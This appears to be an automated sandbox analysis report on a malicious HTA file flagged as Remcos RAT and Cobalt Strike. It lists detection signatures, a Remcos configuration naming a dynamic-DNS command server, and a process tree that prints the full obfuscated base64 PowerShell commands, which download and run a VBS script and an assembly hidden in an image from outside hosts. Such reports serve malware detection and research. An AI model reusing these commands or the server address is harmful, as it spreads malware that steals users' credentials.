Edit tour
Windows
Analysis Report
clearentirethingwithbestnoticetheeverythinggooodfrome.hta
Overview
General Information
Detection
Cobalt Strike, Remcos
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Contains functionality to bypass UAC (CMSTPLUA)
Detected Cobalt Strike Beacon
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Yara detected obfuscated html page
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Yara detected WebBrowserPassView password recovery tool
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match
Classification
- System is w10x64
- mshta.exe (PID: 7372 cmdline:
mshta.exe "C:\Users\ user\Deskt op\clearen tirethingw ithbestnot icetheever ythinggooo dfrome.hta " MD5: 06B02D5C097C7DB1F109749C45F3F505) - cmd.exe (PID: 7484 cmdline:
"C:\Window s\system32 \cmd.exe" "/C PoWERS HELL.Exe -Ex byPas S -n Op - w 1 -c DEvIc eCRedeNtiA ldEPLOYmeN t ; InVo kE-exPREsS iOn($(inVo Ke-EXPResS iOn('[Syst eM.Text.en cOding]'+[ chaR]58+[C HAr]0x3A+' UtF8.GeTsT riNg([SYST Em.convERT ]'+[cHar]5 8+[chAR]58 +'FRoMbaSE 64stRinG(' +[CHaR]0x2 2+'JERjRkp zICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgID0gI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgYURELVR 5UGUgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgL U1FTWJFUmR FRklOSVRpb 04gICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgJ1t EbGxJbXBvc nQoIlVyTE1 PbiIsICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI ENoYXJTZXQ gPSBDaGFyU 2V0LlVuaWN vZGUpXXB1Y mxpYyBzdGF 0aWMgZXh0Z XJuIEludFB 0ciBVUkxEb 3dubG9hZFR vRmlsZShJb nRQdHIgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gcm0sc3Rya W5nICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgIEJ pSUZxTmtqb CxzdHJpbmc gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgQkZoc 0dSLHVpbnQ gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgSE1Ka Gh1LEludFB 0ciAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICB4a 0IpOycgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gLW5BTUUgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIllQIiA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAtbmFNZ VNQQWNlICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gIHRkaU5Yd HJnICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgIC1 QYXNzVGhyd TsgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgJER jRkpzOjpVU kxEb3dubG9 hZFRvRmlsZ SgwLCJodHR wOi8vMTkyL jMuMTIyLjE 1OS8xMjEvc 2ltcGxlZ3J lYXRmZWF0d XJlc3dpdGh uaWNlc3BlY Wtpbmd0aGl uZ3NlbnRpc mVsaWZlZ29 pbmdvbi50S UYiLCIkRW5 WOkFQUERBV EFcL3NpbXB sZWdyZWF0Z mVhdHVyZXN 3aXRobmljZ XNwZWFraW5 ndGhpbmdzZ W50aXJlbGl mZWdvaS52Y lMiLDAsMCk 7U1RhUlQtU 0xlZXAoMyk 7SU52b2tFL WV4UFJlU1N pT24gICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI iRlTlY6QVB QREFUQVwvc 2ltcGxlZ3J lYXRmZWF0d XJlc3dpdGh uaWNlc3BlY Wtpbmd0aGl uZ3NlbnRpc mVsaWZlZ29 pLnZiUyI=' +[ChAR]0X2 2+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7492 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7528 cmdline:
PoWERSHELL .Exe -Ex byPasS -nOp -w 1 -c DEvIceCR edeNtiAldE PLOYmeNt ; InVokE- exPREsSiOn ($(inVoKe- EXPResSiOn ('[SysteM. Text.encOd ing]'+[cha R]58+[CHAr ]0x3A+'UtF 8.GeTsTriN g([SYSTEm. convERT]'+ [cHar]58+[ chAR]58+'F RoMbaSE64s tRinG('+[C HaR]0x22+' JERjRkpzIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgID0gICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg YURELVR5UG UgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgLU1F TWJFUmRFRk lOSVRpb04g ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgJ1tEbG xJbXBvcnQo IlVyTE1Pbi IsICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgIENo YXJTZXQgPS BDaGFyU2V0 LlVuaWNvZG UpXXB1Ymxp YyBzdGF0aW MgZXh0ZXJu IEludFB0ci BVUkxEb3du bG9hZFRvRm lsZShJbnRQ dHIgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgcm 0sc3RyaW5n ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIEJpSU ZxTmtqbCxz dHJpbmcgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgQkZoc0dS LHVpbnQgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgSE1KaGh1 LEludFB0ci AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICB4a0Ip OycgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgLW 5BTUUgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg IllQIiAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AtbmFNZVNQ QWNlICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIH RkaU5YdHJn ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIC1QYX NzVGhydTsg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgJERjRk pzOjpVUkxE b3dubG9hZF RvRmlsZSgw LCJodHRwOi 8vMTkyLjMu MTIyLjE1OS 8xMjEvc2lt cGxlZ3JlYX RmZWF0dXJl c3dpdGhuaW Nlc3BlYWtp bmd0aGluZ3 NlbnRpcmVs aWZlZ29pbm dvbi50SUYi LCIkRW5WOk FQUERBVEFc L3NpbXBsZW dyZWF0ZmVh dHVyZXN3aX RobmljZXNw ZWFraW5ndG hpbmdzZW50 aXJlbGlmZW dvaS52YlMi LDAsMCk7U1 RhUlQtU0xl ZXAoMyk7SU 52b2tFLWV4 UFJlU1NpT2 4gICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgIiRl TlY6QVBQRE FUQVwvc2lt cGxlZ3JlYX RmZWF0dXJl c3dpdGhuaW Nlc3BlYWtp bmd0aGluZ3 NlbnRpcmVs aWZlZ29pLn ZiUyI='+[C hAR]0X22+' ))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - csc.exe (PID: 7656 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\csc .exe" /noc onfig /ful lpaths @"C :\Users\us er\AppData \Local\Tem p\r1df4acf \r1df4acf. cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D) - cvtres.exe (PID: 7672 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE S38A1.tmp" "c:\Users \user\AppD ata\Local\ Temp\r1df4 acf\CSC5F9 E68122E144 DC389875BB F6681BEA.T MP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0) - wscript.exe (PID: 7728 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\simpl egreatfeat ureswithni cespeaking thingsenti relifegoi. vbS" MD5: FF00E0480075B095948000BDC66E81F0) - powershell.exe (PID: 7776 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" $capellmei ster = 'JG 5vbmV2YWx1 YXRpdmUgPS AnaHR0cHM6 Ly9yZXMuY2 xvdWRpbmFy eS5jb20vZH p2YWk4NnVo L2ltYWdlL3 VwbG9hZC92 MTczNDA1MD k5MS91bnhh b29peWt4Zm 13OXBhbjR6 MS5qcGcgJz skZXJ5dGhy b3N0b211bS A9IE5ldy1P YmplY3QgU3 lzdGVtLk5l dC5XZWJDbG llbnQ7JHBp ZWhvbGVzID 0gJGVyeXRo cm9zdG9tdW 0uRG93bmxv YWREYXRhKC Rub25ldmFs dWF0aXZlKT skcGxhY29k ZXJtYXRvdX MgPSBbU3lz dGVtLlRleH QuRW5jb2Rp bmddOjpVVE Y4LkdldFN0 cmluZygkcG llaG9sZXMp OyRiYW5kYm 94ID0gJzw8 QkFTRTY0X1 NUQVJUPj4n OyR5ZW1hbi A9ICc8PEJB U0U2NF9FTk Q+Pic7JHBy ZWxhY3kgPS AkcGxhY29k ZXJtYXRvdX MuSW5kZXhP ZigkYmFuZG JveCk7JGZh bWVkID0gJH BsYWNvZGVy bWF0b3VzLk luZGV4T2Yo JHllbWFuKT skcHJlbGFj eSAtZ2UgMC AtYW5kICRm YW1lZCAtZ3 QgJHByZWxh Y3k7JHByZW xhY3kgKz0g JGJhbmRib3 guTGVuZ3Ro OyR3aXRlbm FnZW1vdCA9 ICRmYW1lZC AtICRwcmVs YWN5OyRzb3 Bob21hbmlh YyA9ICRwbG Fjb2Rlcm1h dG91cy5TdW JzdHJpbmco JHByZWxhY3 ksICR3aXRl bmFnZW1vdC k7JGdyaWZm aW4gPSAtam 9pbiAoJHNv cGhvbWFuaW FjLlRvQ2hh ckFycmF5KC kgfCBGb3JF YWNoLU9iam VjdCB7ICRf IH0pWy0xLi 4tKCRzb3Bo b21hbmlhYy 5MZW5ndGgp XTskYXV0b3 Bsb2lkeSA9 IFtTeXN0ZW 0uQ29udmVy dF06OkZyb2 1CYXNlNjRT dHJpbmcoJG dyaWZmaW4p OyRsZWRlcm l0ZSA9IFtT eXN0ZW0uUm VmbGVjdGlv bi5Bc3NlbW JseV06Okxv YWQoJGF1dG 9wbG9pZHkp OyR1bmJpb3 R1cmJhdGVk ID0gW2RubG liLklPLkhv bWVdLkdldE 1ldGhvZCgn VkFJJyk7JH VuYmlvdHVy YmF0ZWQuSW 52b2tlKCRu dWxsLCBAKC cwLzFEYkJw L3IvZWUuZX RzYXAvLzpz cHR0aCcsIC ckYmFja3Nj YXR0ZXJpbm dzJywgJyRi YWNrc2NhdH RlcmluZ3Mn LCAnJGJhY2 tzY2F0dGVy aW5ncycsIC dDYXNQb2wn LCAnJGJhY2 tzY2F0dGVy aW5ncycsIC ckYmFja3Nj YXR0ZXJpbm dzJywnJGJh Y2tzY2F0dG VyaW5ncycs JyRiYWNrc2 NhdHRlcmlu Z3MnLCckYm Fja3NjYXR0 ZXJpbmdzJy wnJGJhY2tz Y2F0dGVyaW 5ncycsJyRi YWNrc2NhdH RlcmluZ3Mn LCcxJywnJG JhY2tzY2F0 dGVyaW5ncy csJycpKTs= ';$hypoxan thine = [S ystem.Text .Encoding] ::UTF8.Get String([Sy stem.Conve rt]::FromB ase64Strin g($capellm eister));I nvoke-Expr ession $hy poxanthine MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 7784 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - CasPol.exe (PID: 6772 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Cas Pol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B) - CasPol.exe (PID: 4208 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\CasP ol.exe /st ext "C:\Us ers\user\A ppData\Loc al\Temp\fo owuyqkwn" MD5: 914F728C04D3EDDD5FBA59420E74E56B) - CasPol.exe (PID: 1220 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\CasP ol.exe /st ext "C:\Us ers\user\A ppData\Loc al\Temp\qi upnqamsvkx b" MD5: 914F728C04D3EDDD5FBA59420E74E56B) - CasPol.exe (PID: 3448 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\CasP ol.exe /st ext "C:\Us ers\user\A ppData\Loc al\Temp\sk zzoilfgdcc lexm" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Remcos, RemcosRAT | Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity. |
{"Host:Port:Password": ["kelexrmcadmnnccupdated.duckdns.org:14646:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-B3IX49", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Obshtml | Yara detected obfuscated html page | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
Windows_Trojan_Remcos_b296e965 | unknown | unknown |
| |
REMCOS_RAT_variants | unknown | unknown |
| |
Click to see the 21 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
Windows_Trojan_Remcos_b296e965 | unknown | unknown |
| |
REMCOS_RAT_variants | unknown | unknown |
| |
Click to see the 20 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |